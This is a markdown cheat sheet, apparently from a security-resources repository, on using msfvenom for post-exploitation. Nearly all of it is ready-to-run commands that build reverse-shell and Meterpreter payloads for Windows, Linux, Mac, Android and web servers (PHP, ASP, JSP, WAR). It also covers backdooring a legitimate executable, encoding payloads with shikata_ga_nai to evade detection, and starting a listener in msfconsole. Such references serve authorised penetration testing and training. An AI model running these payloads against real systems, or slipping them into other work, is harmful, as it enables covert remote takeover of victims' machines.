cyber-security-resources/post_exploitation/msfvenom.md
2021-07-18 23:17:24 -04:00

2.5 KiB
Raw Blame History

MSFVenom

MsfVenom is a Metasploit standalone payload generator as a replacement for msfpayload and msfencode.

Creating Binaries

The following create different binaries for meterpreter and reverse TCP shells:

Creates a Reverse TCP Meterpreter Shell - Payload for Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f exe > payload.exe

Creates a simple HTTP Payload for Windows

msfvenom -p windows/meterpreter/reverse_http LHOST={HOST/IP} LPORT={PORT} -f exe > payload.exe

Creates a simple TCP Shell for Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f elf > payload.elf

Creates a simple TCP Shell for Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f macho > example.macho

Creates a simple TCP Payload for Android

msfvenom -p android/meterpreter/reverse/tcp LHOST={HOST/IP} LPORT={PORT} R > example.apk

Web Payloads

Creates a Simple TCP Shell for PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f raw > example.php

Creates a Simple TCP Shell for ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f asp > example.asp

Creates a Simple TCP Shell for Javascrip

msfvenom -p java/jsp_shell_reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f raw > example.jsp

Creates a Simple TCP Shell for WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f war > example.war

Windows Payloads

Lists all avalaible encoder

msfvenom -l encoders

Binds an exe with a Payload (Backdoors an exe)

msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f exe > example.exe

Creates a simple TCP payload with shikata_ga_nai encoder

msfvenom -p windows/meterpreter/reverse_tcp LHOST={HOST/IP} LPORT={PORT} -e x86/shikata_ga_nai -b \x00 -i 3 -f exe > example.exe

Binds an exe with a Payload and encodes it

msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={HOST/IP} LPORT={PORT} -e x86/shikata_ga_nai -i 3 -b “\x00” -f exe > example.exe

Getting a Metepreter Shell

omar@ares:~$ sudo msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.123
lhost => 192.168.1.123
msf exploit(multi/handler) > set lport 4444
lport => 4444
msf exploit(multi/handler) > run